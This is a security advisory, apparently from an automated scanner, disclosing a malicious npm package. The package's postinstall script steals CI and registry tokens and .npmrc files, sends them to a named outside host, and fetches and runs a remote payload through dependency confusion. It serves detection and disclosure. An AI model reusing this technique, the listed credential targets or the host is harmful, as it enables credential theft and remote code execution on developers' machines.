@databus-service-ui/ui-event @9.9.10

Summary

scripts/postinstall.js performs two install-time attacks against any machine that runs npm install . (1) Credential exfiltration: it iterates process.env collecting variables whose names match npm_token, github_token, aws_access_key_id, aws_secret_access_key, artifactory_token, nexus_token, node_auth_token, npm_config__auth, etc.; reads ~/.npmrc, /etc/npmrc, and the CWD.npmrc; bundles these with hostname/user/cwd/CI flags; and POSTs the bundle to https://oob.moika.tech/report. (2) Remote code execution: it fetches an OS-specific script from https://oob.moika.tech/payload/{linux,mac,win} (unpinned, no integrity check), writes it to os.tmpdir() as._databus-service-ui_init.sh/.bat, chmods 0755, and spawns it via /bin/sh or cmd.exe detached. Package is scoped @databus-service-ui/* with version 9.9.10 and README pointing at an internal-only registry (npm.databus-service-ui.io) — a textbook dependency-confusion shape designed to win resolution over an internal package of the same name. The script's own comment self-labels it as a 'Dependency confusion payload — AUTHORIZED TESTING ONLY' and reports poc: 'dependency-confusion-npm' , but from any installer's perspective the harm — full CI credential compromise plus arbitrary code execution from oob.moika.tech — is identical to a real attack.

Source: amazon-inspector (b82b3af71dce087a185cffa6f3691ad5a4e4c3d9e35154070ef4ad0dd4f15b10)